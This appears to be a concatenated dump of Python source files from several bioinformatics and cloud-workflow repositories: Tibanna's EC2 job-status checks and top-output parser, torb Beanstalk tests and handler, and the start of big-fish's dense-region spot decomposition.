raise EC2UnintendedTerminationException(errmsg)
# check CPU utilization for the past hour
filesystem = '/dev/nvme1n1' # doesn't matter for cpu utilization
end = datetime.now(tzutc())
start = end - timedelta(hours=1)
jobstart_time = boto3.client('s3').get_object(Bucket=bucket_name, Key=job_started).get('LastModified')
if jobstart_time + timedelta(hours=1) < end:
try:
cw_res = self.TibannaResource(instance_id, filesystem, start, end).as_dict()
except Exception as e:
raise MetricRetrievalException(e)
if 'max_cpu_utilization_percent' in cw_res:
self.terminate_idle_instance(jobid,
instance_id,
cw_res['max_cpu_utilization_percent'],
cw_res['max_ebs_read_bytes'])
# if none of the above
raise StillRunningException("job %s still running" % jobid)
def terminate_idle_instance(self, jobid, instance_id, cpu, ebs_read):
if not cpu or cpu < 1.0:
# the instance wasn't terminated - otherwise it would have been captured in the previous error.
if not ebs_read or ebs_read < 1000: # minimum 1kb
# in case the instance is copying files using <1% cpu for more than 1hr, do not terminate it.
try:
bucket_name = self.input_json['config']['log_bucket']
public_postrun_json = self.input_json['config'].get('public_postrun_json', False)
self.handle_postrun_json(bucket_name, jobid, self.input_json, public_read=public_postrun_json) # We need to record the end time
boto3.client('ec2').terminate_instances(InstanceIds=[instance_id])
errmsg = (
"Nothing has been running for the past hour for job %s,"
"(CPU utilization %s and EBS read %s bytes)."
) % (jobid, str(cpu), str(ebs_read))
raise EC2IdleException(errmsg)
except Exception as e:
errmsg = (
"Nothing has been running for the past hour for job %s,"
"but cannot terminate the instance - cpu utilization (%s) : %s"
) % (jobid, str(cpu), str(e))
logger.error(errmsg)
raise EC2IdleException(errmsg)
def handle_postrun_json(self, bucket_name, jobid, input_json, public_read=False):
postrunjson = "%s.postrun.json" % jobid
if not does_key_exist(bucket_name, postrunjson):
postrunjson_location = "https://s3.amazonaws.com/%s/%s" % (bucket_name, postrunjson)
raise Exception("Postrun json not found at %s" % postrunjson_location)
postrunjsoncontent = json.loads(read_s3(bucket_name, postrunjson))
prj = AwsemPostRunJson(**postrunjsoncontent)
prj.Job.update(instance_id=input_json['config'].get('instance_id', ''))
prj.Job.update(end_time=datetime.now(tzutc()).strftime(AWSEM_TIME_STAMP_FORMAT))
self.handle_metrics(prj)
logger.debug("inside funtion handle_postrun_json")
logger.debug("content=\n" + json.dumps(prj.as_dict(), indent=4))
# upload postrun json file back to s3
acl = 'public-read' if public_read else 'private'
        try:
            boto3.client('s3').put_object(Bucket=bucket_name, Key=postrunjson, ACL=acl,
                                          Body=json.dumps(prj.as_dict(), indent=4).encode())
        except Exception:
            # retry with a private ACL; if that also fails, raise a proper Exception
            try:
                boto3.client('s3').put_object(Bucket=bucket_name, Key=postrunjson, ACL='private',
                                              Body=json.dumps(prj.as_dict(), indent=4).encode())
            except Exception as e:
                raise Exception("error in updating postrunjson %s" % str(e))
# add postrun json to the input json
self.add_postrun_json(prj, input_json, RESPONSE_JSON_CONTENT_INCLUSION_LIMIT)
def add_postrun_json(self, prj, input_json, limit):
prjd = prj.as_dict()
if len(str(prjd)) + len(str(input_json)) < limit:
input_json['postrunjson'] = prjd
else:
if 'commands' in prjd:
del prjd['commands']
if len(str(prjd)) + len(str(input_json)) < limit:
prjd['log'] = 'postrun json not included due to data size limit'
input_json['postrunjson'] = prjd
else:
input_json['postrunjson'] = {'log': 'postrun json not included due to data size limit'}
def handle_metrics(self, prj):
try:
resources = self.TibannaResource(prj.Job.instance_id,
prj.Job.filesystem,
prj.Job.start_time_as_datetime,
prj.Job.end_time_as_datetime)
except Exception as e:
raise MetricRetrievalException("error getting metrics: %s" % str(e))
prj.Job.update(Metrics=resources.as_dict())
self.API().plot_metrics(prj.Job.JOBID, directory='/tmp/tibanna_metrics/',
force_upload=True, open_browser=False,
endtime=prj.Job.end_time_as_datetime,
filesystem=prj.Job.filesystem,
instance_id=prj.Job.instance_id)
```
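`check_task` above drives the polling step of the step function: it looks for `<jobid>.job_started`, `.aborted`, `.error` and `.success` keys in the log bucket and raises the exceptions that the step function retries on. A hedged sketch of the minimal input json it reads, with a placeholder bucket and job id; since neither exists, the call below ends in `EC2StartingException`, while a live job would raise `StillRunningException` until a `.success` or `.error` key appears:
```python
# Minimal sketch; bucket name and job id are placeholders.
from datetime import datetime
from dateutil.tz import tzutc
from tibanna.check_task import check_task
from tibanna.exceptions import EC2StartingException, StillRunningException
from tibanna.vars import AWSEM_TIME_STAMP_FORMAT

input_json = {
    "config": {
        "log_bucket": "my-tibanna-log-bucket",   # assumption: a tibanna log bucket
        "start_time": datetime.strftime(datetime.now(tzutc()), AWSEM_TIME_STAMP_FORMAT),
    },
    "jobid": "some_job_id",
}
try:
    out = check_task(input_json)   # returns the input json once <jobid>.success exists
except EC2StartingException:
    print("no <jobid>.job_started key yet - EC2 is probably still booting")
except StillRunningException:
    print("job started but not finished yet")
```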
#### File: tibanna/tibanna/top.py
```python
import datetime
class Top(object):
"""class TopSeries stores the information of a series of top commands
::
echo -n 'Timestamp: '; date +%F-%H:%M:%S
top -b -n1 [-i] [-c]
over short intervals to monitor the same set of processes over time.
An example input content looks like below, or a series of these.
    The initialization works at any time interval and can be used as a generic
    class, but the class is designed for the output of the regular top command above,
    run at about 1-minute intervals by awsf3 on an AWSEM instance through cron jobs
    (some intervals can be skipped, but there should be no more than 1 record per minute).
This top output can be obtained through ``tibanna log -j <job_id> -t`` or through
API ``API().log(job_id=<job_id>, top=True)``.
::
Timestamp: 2020-12-18-18:55:37
top - 18:55:37 up 4 days, 2:37, 0 users, load average: 5.59, 5.28, 5.76
Tasks: 7 total, 1 running, 6 sleeping, 0 stopped, 0 zombie
%Cpu(s): 6.6 us, 0.1 sy, 0.0 ni, 93.2 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 12971188+total, 10379019+free, 20613644 used, 5308056 buff/cache
KiB Swap: 0 total, 0 free, 0 used. 10834606+avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
712 root 20 0 36.464g 8.223g 19572 S 100.0 6.6 125:55.12 java -Xmx32g -Xms32g -jar juicer_tools.jar addNorm -w 1000 -d -F out.hic
17919 ubuntu 20 0 40676 3828 3144 R 6.2 0.0 0:00.01 top -b -n1 -c -i -w 10000
    The default timestamp from top output does not contain dates, which can screw up
    multi-day processes that are common for bioinformatics pipelines. So, an extra
    timestamp is added before each top command.
To parse top output content, simply create an object. This will create processes attribute,
which is a raw parsed result organized by time stamps.
::
top = Top(top_output_content)
To reorganize the contents by commands, run digest. By default, the max number of commands is 16,
and if there are more than 16 unique commands, they will be collapsed into prefixes.
::
top.digest()
To write a csv / tsv file organized by both timestamps (rows) and commands (columns),
use :func: write_to_csv.
::
top.write_to_csv(...)
"""
# assume this format for timestamp
timestamp_format = '%Y-%m-%d-%H:%M:%S'
# These commands are excluded when parsing the top output
# Currently only 1-, 2- or 3-word prefixes work.
exclude_list = ['top', 'docker', 'dockerd', '/usr/bin/dockerd', 'cron',
'docker-untar', 'containerd', 'goofys-latest', 'cwltool',
'/usr/bin/containerd-shim-runc-v2', 'goofys', 'nodejs --eval',
'/usr/bin/python3 /usr/local/bin/cwltool', 'containerd-shim',
'/usr/bin/python3 /bin/unattended-upgrade',
'/usr/bin/python3 /usr/local/bin/awsf3',
'/usr/bin/python3 /usr/local/bin/aws s3',
'java -jar /usr/local/bin/cromwell.jar',
'java -jar /usr/local/bin/cromwell-35.jar']
def __init__(self, contents):
"""initialization parsed top output content and
creates processes which is a dictionary with timestamps as keys
and a list of Process class objects as a value.
It also creates empty attributes timestamps, commands, cpus and mems
which can be filled through method :func: digest.
"""
self.processes = dict()
self.timestamps = []
self.commands = []
self.cpus = dict()
self.mems = dict()
self.parse_contents(contents)
def parse_contents(self, contents):
is_in_table = False
for line in contents.splitlines():
if line.startswith('Timestamp:'):
timestamp = line.split()[1]
continue
if line.lstrip().startswith('PID'):
is_in_table = True
continue
if not line or line.isspace():
is_in_table = False
if is_in_table:
if timestamp not in self.processes:
self.processes[timestamp] = []
process = Process(line)
if not self.should_skip_process(process):
self.processes[timestamp].append(Process(line))
def digest(self, max_n_commands=16, sort_by='alphabetical'):
"""Fills in timestamps, commands, cpus and mems attributes
from processes attribute.
        :param max_n_commands: When the number of unique commands exceeds
        this value, they are collapsed into unique prefixes.
        :param sort_by: alphabetical|cpu|mem. The commands are sorted
        alphabetically by default, but optionally can be sorted by total cpu or total
        mem (in reverse order, e.g. the first command consumed the most cpu).
        """
        # Reinitialize these so that you get the same results if you run it twice
self.timestamps = []
self.commands = []
self.cpus = dict()
self.mems = dict()
# First fill in commands from commands in processes (and collapse if needed.)
self.commands = self.get_collapsed_commands(max_n_commands)
# Fill in timestamps, cpus and mems from processes, matching collapsed commands.
self.nTimepoints = len(self.processes)
timestamp_ind = 0
for timestamp in sorted(self.processes):
# sorted timestamps (columns)
self.timestamps.append(timestamp)
# commands (rows)
for process in self.processes[timestamp]:
# find a matching collapsed command (i.e. command prefix) and use that as command.
command = Top.convert_command_to_collapsed_command(process.command, self.commands)
if command not in self.cpus:
self.cpus[command] = [0] * self.nTimepoints
self.mems[command] = [0] * self.nTimepoints
self.cpus[command][timestamp_ind] += process.cpu
self.mems[command][timestamp_ind] += process.mem
timestamp_ind += 1
# sort commands according to total cpu
self.sort_commands(by=sort_by)
def get_collapsed_commands(self, max_n_commands):
"""If the number of commands exceeds max_n_commands,
return a collapsed set of commands
that consists of prefixes of commands so that
the total number is within max_n_commands.
First decide the number of words from the beginning of the commands
to collapse commands that start with the same words, i.e.
find the maximum number of words that makes the number of unique commands to be
bounded by max_n_commands.
If using only the first word is not sufficient, go down to the characters of
the first word. If that's still not sufficient, collapse all of them into a single
command ('all_commands')
After the collapse, commands that are unique to a collapsed prefix are
extended back to the original command.
"""
all_commands = set()
for timestamp in self.processes:
all_commands.update(set([pr.command for pr in self.processes[timestamp]]))
if len(all_commands) <= max_n_commands:
# no need to collapse
return list(all_commands)
# decide the number of words from the beginning of the commands
# to collapse commands starting with the same words
all_cmd_lengths = [len(cmd.split()) for cmd in all_commands] # number of words per command
max_cmd_length = max(all_cmd_lengths)
min_cmd_length = min(all_cmd_lengths)
collapsed_len = max_cmd_length - 1
n_commands = len(all_commands)
while(n_commands > max_n_commands and collapsed_len > 1):
reduced_commands = set()
for cmd in all_commands:
reduced_commands.add(Top.first_words(cmd, collapsed_len))
n_commands = len(reduced_commands)
collapsed_len -= 1
# went down to the first words but still too many commands - start splitting characters then
if n_commands > max_n_commands:
all_cmd_lengths = [len(cmd.split()[0]) for cmd in all_commands] # number of characters of the first word
max_cmd_length = max(all_cmd_lengths)
min_cmd_length = min(all_cmd_lengths)
collapsed_len = max_cmd_length - 1
while(n_commands > max_n_commands and collapsed_len > 1):
reduced_commands = set()
for cmd in all_commands:
reduced_commands.add(Top.first_characters(cmd.split()[0], collapsed_len))
n_commands = len(reduced_commands)
collapsed_len -= 1
if n_commands > max_n_commands:
return ['all_commands']
else:
# extend reduced commands that don't need to be reduced
for r_cmd in list(reduced_commands): # wrap in list so that we can remove elements in the loop
uniq_cmds = [cmd for cmd in all_commands if cmd.startswith(r_cmd)]
if len(uniq_cmds) == 1:
reduced_commands.remove(r_cmd)
reduced_commands.add(uniq_cmds[0])
return reduced_commands
def write_to_csv(self, csv_file, metric='cpu', delimiter=',', colname_for_timestamps='timepoints',
timestamp_start=None, timestamp_end=None, base=0):
"""write metrics as csv file with commands as columns
:param metric: 'cpu' or 'mem'
:param delimiter: default ','
        :param colname_for_timestamps: column name for the timepoint column (1st column). default 'timepoints'
:param timestamp_start: start time in the same timestamp format (e.g. 01:23:45),
time stamps will be converted to minutes since start time.
The report starts with minute 0.
Time points with no top records will be filled with 0.
If not specified, the first timestamp in the top commands will be used.
:param timestamp_end: end time in the same timestamp format (e.g. 01:23:45),
The reports will be generated only up to the end time.
Time points with no top records will be filled with 0.
If not specified, the last timestamp in the top commands will be used.
:param base: default 0. If 0, minutes start with 0, if 1, minutes are 1-based (shifted by 1).
"""
metric_array = getattr(self, metric + 's')
if self.timestamps:
if not timestamp_start:
timestamp_start = self.timestamps[0]
if not timestamp_end:
timestamp_end = self.timestamps[-1]
timestamps_as_minutes = self.timestamps_as_minutes(timestamp_start)
last_minute = self.as_minutes(timestamp_end, timestamp_start)
else: # default when timestamps is not available (empty object)
timestamps_as_minutes = range(0, 5)
last_minute = 5
with open(csv_file, 'w') as fo:
# header
# we have to escape any double quotes that are present in the cmd, before wrapping it in double quotes. Otherwise we
# will get incorrect column counts when creating the metrics report.
fo.write(delimiter.join([colname_for_timestamps] + [Top.wrap_in_double_quotes(cmd.replace('"', '""')) for cmd in self.commands]))
fo.write('\n')
# contents
# skip timepoints earlier than timestamp_start
for i in range(0, len(timestamps_as_minutes)):
if timestamps_as_minutes[i] >= 0:
break
for clock in range(0, last_minute + 1):
clock_shifted = clock + base
if i < len(timestamps_as_minutes) and timestamps_as_minutes[i] == clock:
fo.write(delimiter.join([str(clock_shifted)] + [str(metric_array[cmd][i]) for cmd in self.commands]))
i += 1
else:
fo.write(delimiter.join([str(clock_shifted)] + ['0' for cmd in self.commands])) # add 0 for timepoints not reported
fo.write('\n')
def should_skip_process(self, process):
"""A predicate function to check if the process should be skipped (excluded).
It returns True if the input process should be skipped.
e.g. the top command itself is excluded, as well as docker, awsf3, cwltool, etc.
the list to be excluded is in self.exclude_list.
It compares either first word or first two or three words only.
        Kernel threads (single-word commands wrapped in brackets, e.g. [perl]) are also excluded.
"""
first_word = Top.first_words(process.command, 1)
first_two_words = Top.first_words(process.command, 2)
first_three_words = Top.first_words(process.command, 3)
if first_word in self.exclude_list:
return True
elif first_two_words in self.exclude_list:
return True
elif first_three_words in self.exclude_list:
return True
if first_word.startswith('[') and first_word.endswith(']'):
return True
return False
@staticmethod
def convert_command_to_collapsed_command(cmd, collapsed_commands):
if collapsed_commands == 'all_commands': # collapsed to one command
return 'all_commands'
elif cmd in collapsed_commands: # not collapsed
return cmd
else: # collapsed to prefix
all_prefixes = [_ for _ in collapsed_commands if cmd.startswith(_)]
longest_prefix = sorted(all_prefixes, key=lambda x: len(x), reverse=True)[0]
return longest_prefix
def total_cpu_per_command(self, command):
return sum([v for v in self.cpus[command]])
def total_mem_per_command(self, command):
return sum([v for v in self.mems[command]])
def sort_commands(self, by='cpu'):
"""sort self.commands by total cpu (default) or mem in reverse order,
or alphabetically (by='alphabetical')"""
if by == 'cpu':
self.commands = sorted(self.commands, key=lambda x: self.total_cpu_per_command(x), reverse=True)
elif by == 'mem':
self.commands = sorted(self.commands, key=lambda x: self.total_mem_per_command(x), reverse=True)
elif by == 'alphabetical':
self.commands = sorted(self.commands)
@classmethod
def as_minutes(cls, timestamp, timestamp_start):
"""timestamp as minutes since timestamp_start.
:param timestamp: given timestamp in the same format (e.g. 01:23:45)
:param timestamp_start: start timestamp in the same format (e.g. 01:20:45)
In the above example, 3 will be the return value.
"""
dt = cls.as_datetime(timestamp)
dt_start = cls.as_datetime(timestamp_start)
# negative numbers are not supported by timedelta, so do each case separately
if dt > dt_start:
return round((dt - dt_start).seconds / 60)
else:
return -round((dt_start - dt).seconds / 60)
def timestamps_as_minutes(self, timestamp_start):
"""convert self.timestamps to a list of minutes since timestamp_start
:param timestamp_start: timestamp in the same format (e.g. 01:23:45)
"""
return [self.as_minutes(t, timestamp_start) for t in self.timestamps]
@classmethod
def as_datetime(cls, timestamp):
return datetime.datetime.strptime(timestamp, cls.timestamp_format)
@staticmethod
def wrap_in_double_quotes(string):
"""wrap a given string with double quotes (e.g. haha -> "haha")
"""
return '\"' + string + '\"'
@staticmethod
def first_words(string, n_words):
"""returns first n words of a string
e.g. first_words('abc def ghi', 2) ==> 'abc def'
"""
words = string.split()
return ' '.join(words[0:min(n_words, len(words))])
@staticmethod
def first_characters(string, n_letters):
"""returns first n letters of a string
e.g. first_characters('abc def ghi', 2) ==> 'ab'
"""
letters = list(string)
return ''.join(letters[0:min(n_letters, len(letters))])
def as_dict(self):
return self.__dict__
class Process(object):
def __init__(self, top_line):
prinfo_as_list = top_line.lstrip().split()
self.pid = prinfo_as_list[0]
self.user = prinfo_as_list[1]
self.cpu = float(prinfo_as_list[8])
self.mem = float(prinfo_as_list[9])
self.command = ' '.join(prinfo_as_list[11:])
def as_dict(self):
return self.__dict__
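# Illustrative usage sketch (not part of the original module), exercising the
# parsing described in the Top docstring on a tiny, made-up top output.
if __name__ == '__main__':
    _content = (
        "Timestamp: 2020-12-18-18:55:37\n"
        "  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND\n"
        "  712 root      20   0 36.464g 8.223g  19572 S 100.0  6.6 125:55.12 java -jar juicer_tools.jar addNorm\n"
    )
    _top = Top(_content)
    _top.digest()
    print(_top.timestamps)   # ['2020-12-18-18:55:37']
    print(_top.cpus)         # {'java -jar juicer_tools.jar addNorm': [100.0]}
    print(_top.mems)         # {'java -jar juicer_tools.jar addNorm': [6.6]}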
``` |
{
"source": "4dn-dcic/torb",
"score": 2
} |
#### File: tests/create_beanstalk/test_create_bs.py
```python
import pytest
@pytest.fixture
def bs_json():
return {
"source_env": "fourfront-webdev",
"dest_env": "fourfront-staging",
"dry_run": False,
"merge_into": "production",
"repo_owner": "4dn-dcic",
"repo_name": "fourfront",
"branch": "master",
"_overrides": [
{
"waitfor_details": "fourfront-staging.co3gwj7b7tpq.us-east-1.rds.amazonaws.com",
"type": "create_rds",
"id": "fourfront-staging",
"dry_run": False
},
{
"waitfor_details":
"search-fourfront-staging-oqzeugqyyqvgdapb46slrzq5ha.us-east-1.es.amazonaws.com:80",
"type": "create_es",
"id": "fourfront-staging",
"dry_run": False
},
None,
{
"source_env": "fourfront-webdev",
"dest_env": "fourfront-staging",
"dry_run": False,
"merge_into": "production",
"repo_owner": "4dn-dcic",
"repo_name": "fourfront",
"branch": "master"}]}
def test_can_we_get_bs_url(bs_json):
pass
# assert creator(bs_json, 1)
```
#### File: tests/update_foursight/test_update_foursight.py
```python
from ...update_foursight import service
import pytest
import mock
# TODO: This import relates to tests that need to move to dcicutils. See below.
# These comments will go away when the move is accomplished. -kmp 10-Apr-2020
# from dcicutils.beanstalk_utils import create_foursight_auto
@pytest.fixture
def bs_prod_json():
return {
"dest_env": "fourfront-webprod",
"dry_run": False,
}
@pytest.fixture
def bs_json():
return {
"dest_env": "fourfront-mastertest",
"dry_run": False,
}
# TODO: These next two tests (of dcicutils.beanstalk_utils.create_foursight_auto) belong in dcicutils,
# as they don't test any functionality written in this repo. This isn't the right place to be
# distrustful. But, moreover, these tests suppose a particular implementation of that function,
# quite dangerously even, since if that implementation changes, this will execute random pieces
# of operations on production systems. -kmp 10-Apr-2020
#
#
# @mock.patch('dcicutils.beanstalk_utils.get_beanstalk_real_url', return_value='https://data.4dnucleome.org')
# @mock.patch('dcicutils.beanstalk_utils.get_es_from_bs_config', return_value='fake_es_url')
# @mock.patch('dcicutils.beanstalk_utils.create_foursight')
# def test_create_foursight_auto_prod(mock_fs, mock_es, mock_bs, bs_prod_json):
# expected = {
# 'bs_url': 'https://data.4dnucleome.org',
# 'dest_env': 'fourfront-webprod',
# 'es_url': 'fake_es_url',
# 'fs_url': 'data'
# }
#
# create_foursight_auto(bs_prod_json['dest_env'])
# mock_bs.assert_called_once()
# mock_es.assert_called_once_with(expected['dest_env'])
# mock_fs.assert_called_once_with(**expected)
#
#
# @mock.patch('dcicutils.beanstalk_utils.get_beanstalk_real_url', return_value='http://staging.4dnucleome.org')
# @mock.patch('dcicutils.beanstalk_utils.get_es_from_bs_config', return_value='fake_es_url')
# @mock.patch('dcicutils.beanstalk_utils.create_foursight')
# def test_create_foursight_auto_staging_env(mock_fs, mock_es, mock_bs, bs_prod_json):
# expected = {
# 'bs_url': 'http://staging.4dnucleome.org',
# 'dest_env': 'fourfront-webprod',
# 'es_url': 'fake_es_url',
# 'fs_url': 'staging'
# }
#
# create_foursight_auto(bs_prod_json['dest_env'])
# mock_bs.assert_called_once()
# mock_es.assert_called_once_with(expected['dest_env'])
# mock_fs.assert_called_once_with(**expected)
@mock.patch('dcicutils.beanstalk_utils.get_beanstalk_real_url',
return_value='fourfront-mastertest.9wzadzju3p.us-east-1.elasticbeanstalk.com')
@mock.patch('dcicutils.beanstalk_utils.get_es_from_bs_config', return_value='fake_es_url')
@mock.patch('dcicutils.beanstalk_utils.create_foursight')
def test_create_foursight_auto_with_dev_env(mock_create_foursight, mock_get_es_from_bs_config,
mock_get_beanstalk_real_url,
bs_json): # fixture
expected = {
'bs_url': 'fourfront-mastertest.9wzadzju3p.us-east-1.elasticbeanstalk.com',
'dest_env': 'fourfront-mastertest',
'es_url': 'fake_es_url',
'fs_url': 'fourfront-mastertest'
}
service.handler(bs_json, 0)
mock_get_beanstalk_real_url.assert_called_once()
mock_get_es_from_bs_config.assert_called_once_with(expected['dest_env'])
mock_create_foursight.assert_called_once_with(**expected)
@mock.patch('torb.update_foursight.service.bs.create_foursight_auto')
def test_update_foursight_calls_auto_staging(mock_create_foursight_auto):
service.handler({'dest_env': 'staging'}, 1)
mock_create_foursight_auto.assert_called_once_with('staging')
```
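A note on the stacked `mock.patch` decorators used above: patches are applied bottom-up, so the decorator closest to the test function supplies the first mock argument (`mock_create_foursight` here). A small self-contained sketch of that ordering, using `unittest.mock` and standard-library targets for illustration:
```python
# Decorators are applied bottom-up: the innermost patch becomes the first mock argument.
import os
from unittest import mock

@mock.patch('os.path.exists')   # outermost -> last mock argument
@mock.patch('os.path.isdir')    # innermost -> first mock argument
def check_order(mock_isdir, mock_exists):
    os.path.isdir('/tmp')
    mock_isdir.assert_called_once_with('/tmp')
    mock_exists.assert_not_called()

check_order()
```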
#### File: torb/update_bs_config/service.py
```python
import logging
from dcicutils import beanstalk_utils as bs
from ..utils import powerup, get_default
logging.basicConfig()
logger = logging.getLogger('logger')
logger.setLevel(logging.INFO)
@powerup('update_bs_config')
def handler(event, context):
"""
Update the configuration template for an existing ElasticBeanstalk env.
    Pass in the EB environment name in the event JSON as `dest_env` and the
    configuration template as `update-template`. If no template is specified,
    "fourfront-base" is used by default.
    Updates `waitfor_details` in the event JSON after the update.
"""
template = get_default(event, 'update-template', 'fourfront-base')
dest_env = get_default(event, 'dest_env')
dry_run = get_default(event, 'dry_run')
if not dry_run:
# update environment, keeping current EB env variables
res = bs.update_bs_config(dest_env, template, True)
logger.info(res)
event['waitfor_details'] = 'http://' + res['CNAME']
event['type'] = 'create_bs'
return event
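# Illustrative input event for this handler (values are placeholders):
# {"dest_env": "fourfront-mastertest", "update-template": "fourfront-base", "dry_run": true}
# Note that the template is read from the 'update-template' key; when dry_run is set,
# the call to beanstalk_utils.update_bs_config is skipped.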
``` |
{
"source": "4DNucleome/big-fish",
"score": 3
} |
#### File: bigfish/detection/dense_decomposition.py
```python
import warnings
import numpy as np
import bigfish.stack as stack
from .spot_modeling import build_reference_spot, modelize_spot, precompute_erf
from .spot_modeling import gaussian_2d, _initialize_grid_2d
from .spot_modeling import gaussian_3d, _initialize_grid_3d
from skimage.measure import regionprops
from skimage.measure import label
# ### Main function ###
def decompose_dense(image, spots, voxel_size_z=None, voxel_size_yx=100,
psf_z=None, psf_yx=200, alpha=0.5, beta=1, gamma=5):
"""Detect dense and bright regions with potential clustered spots and
simulate a more realistic number of spots in these regions.
#. We estimate image background with a large gaussian filter. We then
remove the background from the original image to denoise it.
#. We build a reference spot by aggregating predetected spots.
#. We fit gaussian parameters on the reference spots.
#. We detect dense regions to decompose.
#. We simulate as many gaussians as possible in the candidate regions.
Parameters
----------
image : np.ndarray
Image with shape (z, y, x) or (y, x).
spots : np.ndarray, np.int64
Coordinate of the spots with shape (nb_spots, 3) or (nb_spots, 2)
for 3-d or 2-d images respectively.
voxel_size_z : int or float or None
Height of a voxel, along the z axis, in nanometer. If None, image is
considered in 2-d.
voxel_size_yx : int or float
Size of a voxel on the yx plan, in nanometer.
psf_z : int or float or None
Theoretical size of the PSF emitted by a spot in the z plan, in
nanometer. If None, image is considered in 2-d.
psf_yx : int or float
Theoretical size of the PSF emitted by a spot in the yx plan, in
nanometer.
alpha : int or float
Intensity percentile used to compute the reference spot, between 0
and 1. The higher, the brighter are the spots simulated in the dense
regions. Consequently, a high intensity score reduces the number of
spots added. Default is 0.5, meaning the reference spot considered is
the median spot.
beta : int or float
Multiplicative factor for the intensity threshold of a dense region.
Default is 1. Threshold is computed with the formula:
.. math::
\\mbox{threshold} = \\beta * \\mbox{max(median spot)}
With :math:`\\mbox{median spot}` the median value of all detected spot
signals.
gamma : int or float
Multiplicative factor use to compute a gaussian scale:
.. math::
\\mbox{scale} = \\frac{\\gamma * \\mbox{PSF}}{\\mbox{voxel size}}
We perform a large gaussian filter with such scale to estimate image
background and remove it from original image. A large gamma increases
the scale of the gaussian filter and smooth the estimated background.
To decompose very large bright areas, a larger gamma should be set.
If 0, image is not denoised.
Returns
-------
spots : np.ndarray, np.int64
Coordinate of the spots detected, with shape (nb_spots, 3) or
(nb_spots, 2). One coordinate per dimension (zyx or yx coordinates).
dense_regions : np.ndarray, np.int64
Array with shape (nb_regions, 7) or (nb_regions, 6). One coordinate
per dimension for the region centroid (zyx or yx coordinates), the
number of RNAs detected in the region, the area of the region, its
average intensity value and its index.
reference_spot : np.ndarray
Reference spot in 3-d or 2-d.
"""
# check parameters
stack.check_array(image,
ndim=[2, 3],
dtype=[np.uint8, np.uint16, np.float32, np.float64])
stack.check_array(spots, ndim=2, dtype=np.int64)
stack.check_parameter(voxel_size_z=(int, float, type(None)),
voxel_size_yx=(int, float),
psf_z=(int, float, type(None)),
psf_yx=(int, float),
alpha=(int, float),
beta=(int, float),
gamma=(int, float))
if alpha < 0 or alpha > 1:
raise ValueError("'alpha' should be a value between 0 and 1, not {0}"
.format(alpha))
if beta < 0:
raise ValueError("'beta' should be a positive value, not {0}"
.format(beta))
if gamma < 0:
raise ValueError("'gamma' should be a positive value, not {0}"
.format(gamma))
# check number of dimensions
ndim = image.ndim
if ndim == 3 and voxel_size_z is None:
raise ValueError("Provided image has {0} dimensions but "
"'voxel_size_z' parameter is missing.".format(ndim))
if ndim == 3 and psf_z is None:
raise ValueError("Provided image has {0} dimensions but "
"'psf_z' parameter is missing.".format(ndim))
if ndim != spots.shape[1]:
raise ValueError("Provided image has {0} dimensions but spots are "
"detected in {1} dimensions."
.format(ndim, spots.shape[1]))
if ndim == 2:
voxel_size_z, psf_z = None, None
# case where no spot were detected
if spots.size == 0:
dense_regions = np.array([], dtype=np.int64).reshape((0, ndim + 4))
reference_spot = np.zeros((5,) * ndim, dtype=image.dtype)
return spots, dense_regions, reference_spot
# compute expected standard deviation of the spots
sigma = stack.get_sigma(voxel_size_z, voxel_size_yx, psf_z, psf_yx)
large_sigma = tuple([sigma_ * gamma for sigma_ in sigma])
# denoise the image
if gamma > 0:
image_denoised = stack.remove_background_gaussian(
image,
sigma=large_sigma)
else:
image_denoised = image.copy()
# build a reference median spot
reference_spot = build_reference_spot(
image_denoised,
spots,
voxel_size_z, voxel_size_yx, psf_z, psf_yx,
alpha)
# case with an empty frame as reference spot
if reference_spot.sum() == 0:
dense_regions = np.array([], dtype=np.int64).reshape((0, ndim + 4))
return spots, dense_regions, reference_spot
# fit a gaussian function on the reference spot to be able to simulate it
parameters_fitted = modelize_spot(
reference_spot, voxel_size_z, voxel_size_yx, psf_z, psf_yx)
if ndim == 3:
sigma_z, sigma_yx, amplitude, background = parameters_fitted
else:
sigma_z = None
sigma_yx, amplitude, background = parameters_fitted
# use connected components to detect dense and bright regions
regions_to_decompose, spots_out_regions, region_size = get_dense_region(
image_denoised,
spots,
voxel_size_z, voxel_size_yx, psf_z, psf_yx,
beta)
# case where no region where detected
if regions_to_decompose.size == 0:
dense_regions = np.array([], dtype=np.int64).reshape((0, ndim + 4))
return spots, dense_regions, reference_spot
# precompute gaussian function values
max_grid = region_size + 1
precomputed_gaussian = precompute_erf(
voxel_size_z, voxel_size_yx, sigma_z, sigma_yx, max_grid=max_grid)
# simulate gaussian mixtures in the dense regions
spots_in_regions, dense_regions = simulate_gaussian_mixture(
image=image_denoised,
candidate_regions=regions_to_decompose,
voxel_size_z=voxel_size_z,
voxel_size_yx=voxel_size_yx,
sigma_z=sigma_z,
sigma_yx=sigma_yx,
amplitude=amplitude,
background=background,
precomputed_gaussian=precomputed_gaussian)
# normally the number of detected spots should increase
if len(spots_out_regions) + len(spots_in_regions) < len(spots):
warnings.warn("Problem occurs during the decomposition of dense "
"regions. Less spots are detected after the "
"decomposition than before.",
UserWarning)
# merge outside and inside spots
spots = np.concatenate((spots_out_regions, spots_in_regions[:, :ndim]),
axis=0)
return spots, dense_regions, reference_spot
# ### Dense regions ###
def get_dense_region(image, spots, voxel_size_z=None, voxel_size_yx=100,
psf_z=None, psf_yx=200, beta=1):
"""Detect and filter dense and bright regions.
A candidate region has at least 2 connected pixels above a specific
threshold.
Parameters
----------
image : np.ndarray
Image with shape (z, y, x) or (y, x).
spots : np.ndarray, np.int64
Coordinate of the spots with shape (nb_spots, 3) or (nb_spots, 2).
voxel_size_z : int or float or None
Height of a voxel, along the z axis, in nanometer. If None, we
consider a 2-d image.
voxel_size_yx : int or float
Size of a voxel on the yx plan, in nanometer.
psf_z : int or float or None
Theoretical size of the PSF emitted by a spot in the z plan, in
nanometer. If None, we consider a 2-d image.
psf_yx : int or float
Theoretical size of the PSF emitted by a spot in the yx plan, in
nanometer.
beta : int or float
Multiplicative factor for the intensity threshold of a dense region.
Default is 1. Threshold is computed with the formula:
.. math::
\\mbox{threshold} = \\beta * \\mbox{max(median spot)}
With :math:`\\mbox{median spot}` the median value of all detected spot
signals.
Returns
-------
dense_regions : np.ndarray
Array with selected ``skimage.measure._regionprops._RegionProperties``
objects.
spots_out_region : np.ndarray, np.int64
